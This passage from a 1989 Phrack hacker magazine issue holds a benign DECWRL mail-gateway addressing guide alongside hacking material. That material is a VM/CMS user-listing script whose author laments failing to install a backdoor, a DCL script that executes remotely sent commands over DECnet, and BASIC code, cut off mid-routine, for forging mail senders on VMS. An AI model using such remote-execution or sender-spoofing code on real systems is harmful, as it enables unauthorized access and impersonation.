IF LD.N ^= DSC & LD.N ^= ' ' & SUBSTR(space(ND.N),1,4)^='LOGO' & (cut)
|
|
SPACE(LD.N)^=SPACE(ND.N) THEN
|
|
A.S = ND.N||'-'||LD.N||',' ; S=S+1 ; USER=USER+1; END;
|
|
END
|
|
CLRSCRN
|
|
call concate
|
|
SAY
|
|
MM= ' <- - - - - - - - - - - - - ' RIGHT(USER,3,0) ' LOGON USERS - - - - (cut)
|
|
- - - - - - - - - - ->'
|
|
say MM
|
|
SAY
|
|
exit
|
|
concate:
|
|
DO I = 1 TO S-1 BY 4
|
|
IF I+1 < S THEN P=I+1 ; ELSE A.P = ' '
|
|
IF I+2 < S THEN Q=I+2 ; ELSE A.Q = ' '
|
|
IF I+3 < S THEN R=I+3 ; ELSE A.R = ' '
|
|
STR= ' '
|
|
IF I+3 < S THEN R=I+3 ; ELSE A.R = ' '
|
|
STR=INSERT(A.I,STR,1) ; STR=INSERT(A.P,STR,21)
|
|
STR=INSERT(A.Q,STR,41) ; STR=INSERT(A.R,STR,61)
|
|
SAY STR
|
|
END
|
|
return
|
|
-----------------------------------Cut Here------------------------------------
|
|
|
|
Well, that is it...Unfortunately, we did not know how to install a backdoor in
|
|
IBM VM/CMS so we could not keep privs permanently. It is a pity...but we're
|
|
glad to share our experience with hackers!
|
|
|
|
Sincerely,
|
|
|
|
Goe
|
|
_______________________________________________________________________________
|
|
|
|
==Phrack Inc.==
|
|
|
|
Volume Three, Issue 30, File #5 of 12
|
|
|
|
()()()()()()()()()()()()()()()()()()()
|
|
() ()
|
|
() The DECWRL Mail Gateway ()
|
|
() ()
|
|
() by Dedicated Link ()
|
|
() ()
|
|
() September 20, 1989 ()
|
|
() ()
|
|
()()()()()()()()()()()()()()()()()()()
|
|
|
|
|
|
INTRODUCTION
|
|
|
|
DECWRL is a mail gateway computer operated by Digital's Western Research
|
|
Laboratory in Palo Alto, California. Its purpose is to support the interchange
|
|
of electronic mail between Digital and the "outside world."
|
|
|
|
DECWRL is connected to Digital's Easynet, and also to a number of different
|
|
outside electronic mail networks. Digital users can send outside mail by
|
|
sending to DECWRL::"outside-address", and digital users can also receive mail
|
|
by having your correspondents route it through DECWRL. The details of incoming
|
|
mail are more complex, and are discussed below.
|
|
|
|
It is vitally important that Digital employees be good citizens of the networks
|
|
to which we are connected. They depend on the integrity of our user community
|
|
to ensure that tighter controls over the use of the gateway are not required.
|
|
The most important rule is "no chain letters," but there are other rules
|
|
depending on whether the connected network that you are using is commercial or
|
|
non-commercial.
|
|
|
|
The current traffic volume (September 1989) is about 10,000 mail messages per
|
|
day and about 3,000 USENET messages per day. Gatewayed mail traffic has
|
|
doubled every year since 1983. DECWRL is currently a Vax 8530 computer with 48
|
|
megabytes of main memory, 2500 megabytes of disk space, 8 9600-baud (Telebit)
|
|
modem ports, and various network connections. They will shortly be upgrading
|
|
to a Vax 8650 system. They run Ultrix 3.0 as the base operating system.
|
|
|
|
|
|
ADMINISTRATION
|
|
|
|
The gateway has engineering staff, but no administrative or clerical staff.
|
|
They work hard to keep it running, but they do not have the resources to answer
|
|
telephone queries or provide tutorials in its use.
|
|
|
|
They post periodic status reports to the USENET newsgroup dec.general. Various
|
|
helpful people usually copy these reports to the VAXNOTES "gateways" conference
|
|
within a day or two.
|
|
|
|
|
|
HOW TO SEND MAIL
|
|
|
|
DECWRL is connected to quite a number of different mail networks. If you were
|
|
logged on directly to it, you could type addresses directly, e.g.
|
|
|
|
To: strange!foreign!address.
|
|
|
|
But since you are not logged on directly to the gateway, you must send mail so
|
|
that when it arrives at the gateway, it will be sent as if that address had
|
|
been typed locally.
|
|
|
|
|
|
* Sending from VMS
|
|
|
|
If you are a VMS user, you should use NMAIL, because VMS mail does not know how
|
|
to requeue and retry mail when the network is congested or disconnected. From
|
|
VMS, address your mail like this:
|
|
|
|
To: nm%DECWRL::"strange!foreign!address"
|
|
|
|
The quote characters (") are important, to make sure that VMS doesn't try to
|
|
interpret strange!foreign!address itself. If you are typing such an address
|
|
inside a mail program, it will work as advertised. If you are using DCL and
|
|
typing directly to the command line, you should beware that DCL likes to remove
|
|
quotes, so you will have to enclose the entire address in quotes, and then put
|
|
two quotes in every place that one quote should appear in the address:
|
|
|
|
$ mail test.msg "nm%DECWRL::""foreign!addr""" /subj="hello"
|
|
|
|
Note the three quotes in a row after foreign!addr. The first two of them are
|
|
doubled to produce a single quote in the address, and the third ends the
|
|
address itself (balancing the quote in front of the nm%).
|
|
|
|
Here are some typical outgoing mail addresses as used from a VMS system:
|
|
|
|
To: nm%DECWRL::"lll-winkin!netsys!phrack"
|
|
To: nm%DECWRL::"postmaster@msp.pnet.sc.edu"
|
|
To: nm%DECWRL::"netsys!phrack@uunet.uu.net"
|
|
To: nm%DECWRL::"phrackserv@CUNYVM.bitnet"
|
|
To: nm%DECWRL::"Chris.Jones@f654.n987.z1.fidonet.org"
|
|
|
|
|
|
* Sending from Ultrix
|
|
|
|
If your Ultrix system has been configured for it, then you can, from your
|
|
Ultrix system, just send directly to the foreign address, and the mail software
|
|
will take care of all of the gateway routing for you. Most Ultrix systems in
|
|
Corporate Research and in the Palo Alto cluster are configured this way.
|
|
|
|
To find out whether your Ultrix system has been so configured, just try it and
|
|
see what happens. If it doesn't work, you will receive notification almost
|
|
instantly.
|
|
|
|
NOTE: The Ultrix mail system is extremely flexible; it is almost
|
|
completely configurable by the customer. While this is valuable to
|
|
customers, it makes it very difficult to write global instructions for
|
|
the use of Ultrix mailers, because it is possible that the local changes
|
|
have produced something quite unlike the vendor-delivered mailer. One of
|
|
the popular changes is to tinker with the meaning of quote characters (")
|
|
in Ultrix addresses. Some systems consider that these two addresses are
|
|
the same:
|
|
|
|
site1!site2!user@host.dec.com
|
|
|
|
and
|
|
|
|
"site1!site2!user"@host.dec.com
|
|
|
|
while others are configured so that one form will work and the other
|
|
will not. All of these examples use the quotes. If you have trouble
|
|
getting the examples to work, please try them again without the quotes.
|
|
Perhaps your Ultrix system is interpreting the quotes differently.
|
|
|
|
If your Ultrix system has an IP link to Palo Alto (type "/etc/ping
|
|
decwrl.dec.com" to find out if it does), then you can route your mail to the
|
|
gateway via IP. This has the advantage that your Ultrix mail headers will
|
|
reach the gateway directly, instead of being translated into DECNET mail
|
|
headers and then back into Ultrix at the other end. Do this as follows:
|
|
|
|
To: "alien!address"@decwrl.dec.com
|
|
|
|
The quotes are necessary only if the alien address contains a ! character, but
|
|
they don't hurt if you use them unnecessarily. If the alien address contains
|
|
an "@" character, you will need to change it into a "%" character. For
|
|
example, to send via IP to joe@widget.org, you should address the mail
|
|
|
|
To: "joe%widget.org"@decwrl.dec.com
|
|
|
|
If your Ultrix system has only a DECNET link to Palo Alto, then you should
|
|
address mail in much the same way that VMS users do, save that you should not
|
|
put the nm% in front of the address:
|
|
|
|
To: DECWRL::"strange!foreign!address"
|
|
|
|
Here are some typical outgoing mail addresses as used from an Ultrix system
|
|
that has IP access. Ultrix systems without IP access should use the same
|
|
syntax as VMS users, except that the nm% at the front of the address should not
|
|
be used.
|
|
|
|
To: "lll-winken!netsys!phrack"@decwrl.dec.com
|
|
To: "postmaster%msp.pnet.sc.edu"@decwrl.dec.com
|
|
To: "phrackserv%CUNYVM.bitnet"@decwrl.dec.com
|
|
To: "netsys!phrack%uunet.uu.net"@decwrl.dec.com
|
|
To: "Chris.Jones@f654.n987.z1.fidonet.org"@decwrl.dec.com
|
|
|
|
|
|
DETAILS OF USING OTHER NETWORKS
|
|
|
|
All of the world's computer networks are connected together, more or less, so
|
|
it is hard to draw exact boundaries between them. Precisely where the Internet
|
|
ends and UUCP begins is a matter of interpretation.
|
|
|
|
For purposes of sending mail, though, it is convenient to divide the network
|
|
universe into these categories:
|
|
|
|
Easynet Digital's internal DECNET network. Characterized by addresses
|
|
of the form NODE::USER. Easynet can be used for commercial
|
|
purposes.
|
|
|
|
Internet A collection of networks including the old ARPAnet, the NSFnet,
|
|
the CSnet, and others. Most international research,
|
|
development, and educational organizations are connected in
|
|
some fashion to the Internet. Characterized by addresses of
|
|
the form user@site.subdomain.domain. The Internet itself
|
|
cannot be used for commercial purposes.
|
|
|
|
UUCP A very primitive network with no management, built with
|
|
auto-dialers phoning one computer from another. Characterized
|
|
by addresses of the form place1!place2!user. The UUCP network
|
|
can be used for commercial purposes provided that none of the
|
|
sites through which the message is routed objects to that.
|
|
|
|
USENET Not a network at all, but a layer of software built on top of
|
|
UUCP and Internet.
|
|
|
|
BITNET An IBM-based network linking primarily educational sites.
|
|
Digital users can send to BITNET as if it were part of
|
|
Internet, but BITNET users need special instructions for
|
|
reversing the process. BITNET cannot be used for commercial
|
|
purposes.
|
|
|
|
Fidonet A network of personal computers. I am unsure of the status of
|
|
using Fidonet for commercial purposes, nor am I sure of its
|
|
efficacy.
|
|
|
|
|
|
DOMAINS AND DOMAIN ADDRESSING
|
|
|
|
There is a particular network called "the Internet;" it is somewhat related to
|
|
what used to be "the ARPAnet." The Internet style of addressing is flexible
|
|
enough that people use it for addressing other networks as well, with the
|
|
result that it is quite difficult to look at an address and tell just what
|
|
network it is likely to traverse. But the phrase "Internet address" does not
|
|
mean "mail address of some computer on the Internet" but rather "mail address
|
|
in the style used by the Internet." Terminology is even further confused
|
|
because the word "address" means one thing to people who build networks and
|
|
something entirely different to people who use them. In this file an "address"
|
|
is something like "mike@decwrl.dec.com" and not "192.1.24.177" (which is what
|
|
network engineers would call an "internet address").
|
|
|
|
The Internet naming scheme uses hierarchical domains, which despite their title
|
|
are just a bookkeeping trick. It doesn't really matter whether you say
|
|
NODE::USER or USER@NODE, but what happens when you connect two companies'
|
|
networks together and they both have a node ANCHOR?? You must, somehow,
|
|
specify which ANCHOR you mean. You could say ANCHOR.DEC::USER or
|
|
DEC.ANCHOR::USER or USER@ANCHOR.DEC or USER@DEC.ANCHOR. The Internet
|
|
convention is to say USER@ANCHOR.DEC, with the owner (DEC) after the name
|
|
(ANCHOR).
|
|
|
|
But there could be several different organizations named DEC. You could have
|
|
Digital Equipment Corporation or Down East College or Disabled Education
|
|
Committee. The technique that the Internet scheme uses to resolve conflicts
|
|
like this is to have hierarchical domains. A normal domain isn't DEC or
|
|
STANFORD, but DEC.COM (commercial) and STANFORD.EDU (educational). These
|
|
domains can be further divided into ZK3.DEC.COM or CS.STANFORD.EDU. This
|
|
doesn't resolve conflicts completely, though: both Central Michigan University
|
|
and Carnegie-Mellon University could claim to be CMU.EDU. The rule is that the
|
|
owner of the EDU domain gets to decide, just as the owner of the CMU.EDU gets
|
|
to decide whether the Electrical Engineering department or the Elementary
|
|
Education department gets subdomain EE.CMU.EDU.
|
|
|
|
The domain scheme, while not perfect, is completely extensible. If you have
|
|
two addresses that can potentially conflict, you can suffix some domain to the
|
|
end of them, thereby making, say, decwrl.UUCP be somehow different from
|
|
DECWRL.ENET.
|
|
|
|
DECWRL's entire mail system is organized according to Internet domains, and in
|
|
fact we handle all mail internally as if it were Internet mail. Incoming mail
|
|
is converted into Internet mail, and then routed to the appropriate domain; if
|
|
that domain requires some conversion, then the mail is converted to the
|
|
requirements of the outbound domain as it passes through the gateway. For
|
|
example, they put Easynet mail into the domain ENET.DEC.COM, and they put
|
|
BITNET mail into the domain BITNET.
|
|
|
|
The "top-level" domains supported by the DECWRL gateway are these:
|
|
|
|
.EDU Educational institutions
|
|
.COM Commercial institutions
|
|
.GOV Government institutions
|
|
.MIL Military institutions
|
|
.ORG Various organizations
|
|
.NET Network operations
|
|
.BITNET The BITNET
|
|
.MAILNET The MAILNET
|
|
.?? 2-character country code for routing to other countries
|
|
.OZ Part of the Australian (.AU) name space.
|
|
|
|
2-character country codes include UK (United Kingdom), FR (France), IT (Italy),
|
|
CA (Canada), AU (Australia), etc. These are the standard ISO 2-character
|
|
country codes.
|
|
|
|
|
|
MAILING TO EASYNET
|
|
|
|
To mail to user SPRINTER at node WASH (which is DECNET address WASH::SPRINTER),
|
|
Internet mail should be addressed to sprinter@wash.enet.dec.com. Easynet
|
|
addresses are not case-dependent; WASH and wash are the same node name and
|
|
SPRINTER and sprinter are the same user name.
|
|
|
|
Sites that are not directly connected to the Internet may have difficulty with
|
|
Internet addresses like wash.enet.dec.com. They can send into the Easynet by
|
|
explicitly routing the mail through DECWRL. From domain-based Internet
|
|
mailers, the address would be sprinter%wash.enet@decwrl.dec.com. From UUCP
|
|
mailers, the address would be decwrl!wash.enet!sprinter. Some Internet mailers
|
|
require the form <@decwrl.dec.com:sprinter@wash.enet>. (This last form is the
|
|
only technically correct form of explicit route, but very few Internet sites
|
|
support it.)
|
|
|
|
The DECWRL gateway also supports various obsolete forms of addressing that are
|
|
left over from the past. In general they support obsolete address forms for
|
|
two years after the change, and then remove it.
|
|
|
|
|
|
MAILING TO DIGITAL ALL-IN-1 USERS
|
|
|
|
Some Easynet users do not have a direct DECNET node address, but instead read
|
|
their mail with All-in-1, which uses addresses of the form "Nate State @UCA".
|
|
Here "UCA" is a Digital location code name. To route mail to such people, send
|
|
to Nate.State@UCA.MTS.DEC.COM. Mail received from the All-in-1 mailer is
|
|
unreplyable, and in fact unless the respondent tells you his return address in
|
|
the body of the message, it is not normally possible even to puzzle out the
|
|
return address by studying the message header. Mail from All-in-1 to Easynet
|
|
passes through a gateway program that does not produce valid return addresses.
|
|
|
|
|
|
MAILING TO THE INTERNET
|
|
|
|
DECWRL's mailer is an Internet mailer, so to mail to an Internet site, just use
|
|
its address. If you are having trouble determining the Internet address, you
|
|
might find that the Ultrix host table /etc/hosts.txt is useful. If you can't
|
|
find one anywhere else, there's one on DECWRL. See the comments above under
|
|
"how to send mail" for details about making sure that the mail program you are
|
|
using has correctly interpreted an address.
|
|
|
|
|
|
MAILING TO UUCP
|
|
|
|
UUCP mail is manually routed by the sender, using ! as the separator character.
|
|
Thus, the address xxx!yyy!zzz!user means to dial machine xxx and relay to it
|
|
the mail, with the destination address set to yyy!zzz!user. That machine in
|
|
turn dials yyy, and the process repeats itself.
|
|
|
|
To correctly address UUCP mail, you must know a working path through the UUCP
|
|
network. The database is sufficiently chaotic that automatic routing does not
|
|
work reliably (though many sites perform automatic routing anyhow). The
|
|
information about UUCP connectivity is distributed in the USENET newsgroup
|
|
comp.mail.maps; many sites collect this data and permit local queries of it.
|
|
|
|
At the end of this file is a list of the UUCP nodes to which DECWRL currently
|
|
has a working connection.
|
|
|
|
|
|
MAILING TO USENET
|
|
|
|
Usenet is not a network. It's a software layer, and it spans several networks.
|
|
Many people say "Usenet" when they really mean UUCP. You can post a message to
|
|
a Usenet newsgroup by mailing it to "name@usenet" at DECWRL. For example,
|
|
mailing from VMS to this address:
|
|
|
|
nm%DECWRL::"alt.cyberpunk@usenet"
|
|
|
|
causes the mail message to be posted as an article to the Usenet newsgroup
|
|
alt.cyberpunk. It is better to use Usenet software for posting articles, as
|
|
more features are available that way, such as restricted distributions,
|
|
crossposting, and cancellation of "wish I hadn't sent that" articles.
|
|
|
|
|
|
MAILING TO BITNET
|
|
|
|
Legend has it that the "BIT" in BITNET stands for "Because It's There" or
|
|
"Because It's Time." It is a network consisting primarily of IBM computers. A
|
|
native BITNET address is something like "OMAR at STANFORD", but when translated
|
|
into our Internet format it becomes omar@stanford.bitnet. Once translated into
|
|
Internet form, a BITNET address is used just like any other Internet address.
|
|
|
|
|
|
MAILING TO FIDONET
|
|
|
|
By comparison with the other linked networks, Fidonet has an addressing
|
|
complexity bordering on the bizarre. The Fidonet people have provided me with
|
|
this description:
|
|
|
|
Each Fidonet node is a member of a "network," and may have subsidiary nodes
|
|
called "point nodes." A typical Fido address is "1:987/654" or "987/654"; a
|
|
typical Fido "point node" address is "1:987/654.32" or "987/654.32". This is
|
|
zone 1, network 987, Fido (node) 654, "point node" 32. If the zone number is
|
|
missing, assume it is zone 1. The zone number must be supplied in the outgoing
|
|
message.
|
|
|
|
To send a message to Chris Jones on Fidonet address 1:987/654, use the address
|
|
Chris.Jones@f654.n987.z1.fidonet.org. To send a message to Mark Smith at
|
|
Fidonet node 987/654.32, use address Mark.Smith@p32.f654.n987.z1.fidonet.org.
|
|
Use them just like any other Internet address.
|
|
|
|
Sometimes the return addresses on messages from Fidonet will look different.
|
|
You may or may not be able to reply to them.
|
|
|
|
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
|
|
|
|
Appendix: List of UUCP Neighbor Sites
|
|
|
|
This table shows most of the sites that DECWRL dials directly via UUCP. You
|
|
may find it useful to help you construct a UUCP route to a particular
|
|
destination. Those sites marked with "*" are major UUCP routing nodes. You
|
|
should prefer UUCP routes that use these sites as the first hop from DECWRL.
|
|
Case is significant in UUCP host names.
|
|
|
|
3comvax 3Com Corporation, Santa Clara, CA
|
|
abvax Allen-Bradley Company, Highland Heights, OH
|
|
acad Autodesk, Inc, Sausalito, CA
|
|
adobe Adobe Systems Inc., Mountain View, CA
|
|
alberta University of Alberta, Edmonton, Alberta, Canada
|
|
allegra AT&T Bell Laboratories, Murray Hill, NJ
|
|
*amdahl Amdahl Corp., Sunnyvale, CA
|
|
amdcad Advanced Micro Devices, Sunnyvale, CA
|
|
ames NASA Ames Research Center, Mountain View, CA
|
|
*apple Apple Computers, Cupertino, CA
|
|
ardent Ardent Computer Corp., Sunnyvale, CA
|
|
argosy MassPar Computer Corp., Sunnyvale, CA
|
|
atha Athabasca University, Athabasca, Alberta, Canada
|
|
athertn Atherton Technology, Sunnyvale, CA
|
|
*att AT&T Bell Laboratories, Columbus, Ohio
|
|
avsd Ampex Corporation, Redwood City, CA
|
|
cae780 Tektronix Inc. (Santa Clara Field Office) Santa Clara, CA
|
|
chip M/A-COM Government Systems, San Diego, CA
|
|
claris Claris Corporation, Mountain View, CA
|
|
daisy Daisy Systems, Mountain View, CA
|
|
decuac DEC/Ultrix Applications Ctr, Landover, MD
|
|
*decvax DEC/Ultrix Engineering, Nashua, NH
|
|
dsinc Datacomp Systems, Inc, Huntington Valley, PA
|
|
eda EDA Systems Inc., Santa Clara, CA
|
|
emerald Emerald Systems Corp., San Diego, CA
|
|
escd Evans and Sutherland Computer Division, Mountain View, CA
|
|
esunix Evans and Sutherland Corp., Salt Lake City, UT
|
|
fluke John Fluke Manufacturing, Everett, WA
|
|
gryphon Trailing Edge Technology, Redondo Beach, CA
|
|
handel Colorodo State Univ., CS Dept., Ft. Collins, CO
|
|
hoptoad Nebula Consultants, San Francisco, CA
|
|
*hplabs Hewlett Packard Research Labs, Palo Alto, CA
|
|
ide Interactive Development Environments, San Francisco, CA
|
|
idi Intelligent Decisions, Inc., San Jose, CA
|
|
imagen Imagen Corp., Santa Clara, CA
|
|
intelca Intel Corp., Santa Clara, CA
|
|
limbo Intuitive Systems, Los Altos, CA
|
|
logitech Logitech, Inc., Palo Alto, CA
|
|
megatest Megatest Corp., San Jose, CA
|
|
metaphor Metaphor Corp., Mountain View, CA
|
|
microsoft Microsoft, Bellevue, WA
|
|
mindcrf Mindcraft Corp., Palo Alto, CA
|
|
mips MIPS Computer Systems, Mountain View, CA
|
|
mntgfx Mentor Graphics Corp., Beaverton, OR
|
|
mordor Lawrence Livermore National Lab, Livermore, CA
|
|
mtu Michigan Tech Univ., Houghton, MI
|
|
mtxinu Mt. Xinu, Berkeley, CA
|
|
nsc National Semiconductor Corp., Sunnyvale, CA
|
|
oli-stl Olivetti Software Techn. Lab, Menlo Park, CA
|
|
oracle Oracle Corp., Belmont, CA
|
|
*pacbell Pacific Bell, San Ramon, CA
|
|
parcplace Parc Place Systems, Palo Alto, CA
|
|
purdue Purdue University, West Lafayette, IN
|
|
*pyramid Pyramid Technology Corporation, Mountain View, CA
|
|
qubix Qubix Graphic Systems, San Jose, CA
|
|
quintus Quintus Computer Systems, Mountain View, CA
|
|
research AT&T Bell Laboratories, Murray Hill, NJ
|
|
riacs Res.Inst. for Adv. Compu. Sci., Mountain View, CA
|
|
rtech Relational Technology Inc., Alameda, CA
|
|
sci Silicon Compilers, San Jose, CA
|
|
sco Santa Cruz Operation, Santa Cruz, CA
|
|
sequent Sequent Computer System, Inc., Beaverton, OR
|
|
sgi Silicon Graphics, Inc., Mountain View, CA
|
|
shell Shell Development Corp., Houston, TX
|
|
simpact Simpact Assoc., San Diego, CA
|
|
sjsca4 Schlumberger Technologies, San Jose, CA
|
|
sun Sun Microsystems, Mountain View, CA
|
|
td2cad Intel Corp., Santa Clara, CA
|
|
teraida Teradyne EDA Inc., Santa Clara, CA
|
|
theta Process Software Inc., Wellesley, MA
|
|
turtlevax CIMLINC, Inc, Palo Alto, CA
|
|
*ucbvax University of California, Berkeley, CA
|
|
utcsri Univ. of Toronto, Computer Science, Toronto, CA
|
|
vlsisj VLSI Technology Inc., San Jose, CA
|
|
wyse Wyse Technology, San Jose, CA
|
|
zehntel Zehntel, Inc., Walnut Creek, CA
|
|
_______________________________________________________________________________
|
|
|
|
==Phrack Inc.==
|
|
|
|
Volume Three, Issue 30, File #6 of 12
|
|
|
|
Decnet Hackola : Remote Turist TTY (RTT)
|
|
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
|
|
|
A Late-Night Creation Of
|
|
|
|
*Hobbit*
|
|
|
|
This VMS network frob is yet another "tell"-type thing. This one has an
|
|
uncommon feature though: recursion (i.e. you can be connected to some host
|
|
and open *another* connection to a third host and it will [attempt to!] "do the
|
|
right thing"). Also, you can ^Y out and if you run it again, it will return to
|
|
the open connection instead of starting a new one.
|
|
|
|
_H*
|
|
|
|
|
|
*************************************************************************
|
|
$! RTT -- Remote Turist TTY interface. Do @RTT hostname or @RTT area.node
|
|
$! to start; this file must exist in the remote machine's default area.
|
|
$! You can ^Y out and the network channel will stick around; invoking RTT
|
|
$! again will resume the extant process and ignore arguments.
|
|
$! If we are a network object, play server, if not, we must be the client.
|
|
$! If we are called while already playing server, recurse to the end host.
|
|
$! This recursion in theory can happen infinite times. Make damn sure
|
|
$! what you call this file and the "task=" spec jive, and that they are the
|
|
$! same file, or you will fall victim to very vicious timing screws.
|
|
$!
|
|
$! Another result of *Hobbit* abusing network file jobs until well past dawn.
|
|
$!
|
|
$! _H*
|
|
$set noon
|
|
$if f$mode().eqs."NETWORK".and.p1.eqs."" then $goto srv
|
|
$! Talking to a luser, go find the net job
|
|
$magic=0 ! assume top level
|
|
$if f$trnlnm("nf",,,,,"table_name").nes."" then $goto lread
|
|
$sl=f$len(p1)
|
|
$dot=f$locate(".",p1) ! area.node
|
|
$if sl.eq.dot then $goto nopen ! no dot, treat normally
|
|
$q=f$loc("""",p1) ! access control??
|
|
$node=f$ext(0,dot,p1) ! area
|
|
$dot=dot+1 ! point past it now
|
|
$node=node*1024+f$ext(dot,q-dot,p1) ! and pull out the complete node
|
|
$rest=""""+f$ext(q,80,p1)+"""" ! superquotify the quotes [yeccchh!]
|
|
$p1="''node'''rest'" ! add remains in stringwise [ack barf]
|
|
$! We were called with an argument; but if we're network mode, we're *already*
|
|
$! a server, so do special things.
|
|
$nopen: $if f$mode().eqs."NETWORK" then $magic=1
|
|
$! Top-level user process or recursed here: client connect
|
|
$open/read/write/err=yuk nf 'p1'::"0=rtt"
|
|
$read/time=5/err=yuk nf hprm ! let other end tell us where we got
|
|
$prm==hprm ! global prompt str so we resume correctly
|
|
$write sys$output "Connection open"
|
|
$if magic then $goto m_setup
|
|
$lread: $read/prompt="''prm'$ "/end=lclose sys$command line
|
|
$write nf line ! send the sucker and go get the stuff
|
|
$ltype: $read/time=8/err=tmo/end=lclose nf line
|
|
$if line.eqs."%%eoc%%" then $goto lread
|
|
$if line.eqs."%%magic%%" then $goto newprm
|
|
$write sys$output line
|
|
$goto ltype
|
|
$newprm: $read nf hprm ! new prompt gets piped in from servers
|
|
$prm==hprm ! let us find it
|
|
$read nf line ! garbola %%eoc%% -- avoid timing fuckup
|
|
$if line.nes."%%eoc%%" then $goto hpe !! oops !!
|
|
$goto lread
|
|
$tmo: $write sys$output "[Timed out]" ! supposed to bail out on a fuckup
|
|
$goto lread ! it doesn't always work, though.
|
|
$!
|
|
$! Do a special dance when we're recursing
|
|
$m_setup: $write nnn "%%magic%%"
|
|
$write nnn prm ! notify client end of new connection
|
|
$signal ! flush the inbetweens
|
|
$goto rread ! and drop to magic server
|
|
$!
|
|
$srv: ! Normal remote task half
|
|
$! This is an unbelievable kludge. You can't just open sys$net: and then
|
|
$! have program output go there as well as the control thingies, but you
|
|
$! *can* pipe everything to your sys$net-opened-device: and it *works*!
|
|
$open/read/write/err=yuk nnn sys$net:
|
|
$close sys$output ! netserver.log?
|
|
$close sys$error
|
|
$magic=0 ! not recursing yet
|
|
$! Some handy symbols for the far end
|
|
$rtt:==@sys$login:rtt ! make further connects easier
|
|
$ncp:==$ncp ! for hacking the network
|
|
$signal:==write nnn """%%eoc%%""" ! magic sync string
|
|
$write nnn f$trnl("sys$node","lnm$system_table") ! HELO...
|
|
$def/pr sys$output nnn: ! the awful kludge is invoked
|
|
$def/pr sys$error nnn: ! for error handling too
|
|
$!
|
|
$! Server loop
|
|
$rread: $read/end=rclose nnn line
|
|
$if magic then $goto passing
|
|
$'line'
|
|
$m_cmd_end: $signal ! signal for all completions
|
|
$goto rread
|
|
$! If we're magically in the middle, handle differently
|
|
$passing: $write nf line
|
|
$mtype: $read/time=5/err=mclose/end=mclose nf line
|
|
$if line.eqs."%%eoc%%" then $goto m_cmd_end
|
|
$write nnn line
|
|
$goto mtype
|
|
$!
|
|
$! Closure and error handlers
|
|
$! General protocol error catch
|
|
$yuk: $write sys$output "Couldn't open network!"
|
|
$exit
|
|
$! Here if the luser typed ^Z
|
|
$lclose: $close nf ! should signal eof at far end
|
|
$exit
|
|
$! Here if we got hung up on by the client
|
|
$rclose: $if magic then $close nf
|
|
$close nnn
|
|
$stop/id=0
|
|
$! Here if we're magic and our remote server exited: tell client whats flying
|
|
$mclose: $close nf
|
|
$magic=0
|
|
$write nnn "%%magic%%"
|
|
$write nnn f$trnl("sys$node","lnm$system_table")
|
|
$signal
|
|
$goto rread
|
|
$! Here if we recursed down the line there and didn't see the right things
|
|
$hpe: $write sys$output "!!Hairy protocol error!!"
|
|
$close nf
|
|
$exit
|
|
_______________________________________________________________________________
|
|
|
|
==Phrack Inc.=
|
|
|
|
Volume Three, Issue 30, File #7 of 12
|
|
|
|
=-------------------=
|
|
|
|
VAX/VMS Fake Mail
|
|
|
|
by Jack T. Tab
|
|
|
|
=-------------------=
|
|
|
|
|
|
In the August 1986 issue of VAX PROFESSIONAL, the BASIC subroutine that appears
|
|
at the end of this text was published. It was not until more than two years
|
|
later that DEC included a callable mail interface with VMS 5.x. While the
|
|
official version is much more extensive, the routine included here has one
|
|
important feature. The ability to have a mail message appear to be from
|
|
someone else is a good addition to most "toolkits."
|
|
|
|
VMS Mail works in two manners. The first is the familiar interactive. The
|
|
second is as a network object. In this method, MAIL is invoked by the
|
|
NETSERVER.COM command procedure in response to an incoming connect request.
|
|
MAIL.EXE is activated as network object 27. The other network objects can be
|
|
viewed by using the NCP command SHOW KNOWN OBJECTS. In this mode, MAIL.EXE
|
|
operates as a slave process, receiving instructions from the master process.
|
|
The master, in most cases, is another process running MAIL.EXE interactively.
|
|
The slave process can handle requests to deliver mail to as many recipients as
|
|
necessary. Addresses that are not on the same node as the slave process are
|
|
forwarded by activating yet another slave process on the target node. The
|
|
information sent by the master MAIL to the slave MAIL is quite simple and
|
|
straightforward, consisting of a series of strings.
|
|
|
|
The first string is for the FROM name. This is what makes the subroutine
|
|
useful, as it can be anything (i.e. the_Easter_Bunny). The next set of strings
|
|
are to whom the mail is to be sent. One address per string, with a null
|
|
string, chr(0), terminating the list. The third item is what the receiver(s)
|
|
sees in their TO: field. This also can be anything. VMS MAIL can use this
|
|
option for its .DIS distribution lists. The final information is the body of
|
|
the message. It too is terminated by another null string. The subject of the
|
|
mail message is taken from the first line of this text.
|
|
|
|
The MAIL slave will send back appropriate status messages indicating problems
|
|
if they occur. Such as "Addressee Unknown" or VMS and DECnet errors like "Disk
|
|
Quota Exceeded" or "Remote Node Not Reachable").
|
|
|
|
The only privilege that seems necessary is NETMBX. Without it the subroutine
|
|
cannot call MAIL as a network object. Our beloved system management resolved
|
|
the problem of people pretending to be SYSTEM by installing MAIL with NETMBX
|
|
and removing the priv from the student accounts. The subroutine works just as
|
|
well with JNET and BITNET as it does with DECNET addresses.
|
|
|
|
|
|
***********************************CUT HERE************************************
|
|
1 %TITLE 'MAIL SUBROUTINE'
|
|
|
|
SUB MAILT( STRING NODE, &
|
|
STRING FROM_NAME, &
|
|
STRING TO_LIST(), &
|
|
STRING TO_SHOW, &
|
|
STRING SUBJECT, &
|
|
STRING TEXT() )
|
|
|
|
OPTION TYPE = INTEGER
|
|
|
|
DECLARE INTEGER FUNCTION &
|
|
PUT_MSG
|
|
|
|
DECLARE STRING FUNCTION &
|
|
GET_MSG, &
|
|
GET_INPUT
|
|
|
|
DECLARE INTEGER CONSTANT &
|
|
TRUE = -1, &
|
|
FALSE = 0
|
|
Net_Link_Open = FALSE
|
|
|
|
Z = POS( NODE + ":" , ":" , 1)
|
|
NODE_NAME$ = LEFT$( NODE , Z - 1 )
|
|
ON ERROR GOTO Mail_Net_Error
|
|
MAIL_CHANNEL = 12
|
|
OPEN NODE_NAME$ + '::"27="' AS FILE MAIL_CHANNEL
|
|
|
|
Net_Link_Open = TRUE
|
|
|
|
STS = PUT_MSG( FROM_NAME )
|
|
IF STS <> 0 THEN
|
|
GOTO ERROR_DONE
|
|
END IF
|
|
RECEIVERS = 0
|
|
TO_COUNT = 1
|
|
|
|
Mail_Recipients:
|
|
IF TO_LIST( TO_COUNT ) = "" THEN
|
|
GOTO End_Of_Line
|
|
END IF
|
|
STS = PUT_MSG( EDIT$( TO_LIST( TO_COUNT ) , 32 ) )
|
|
IF STS <> 0 THEN
|
|
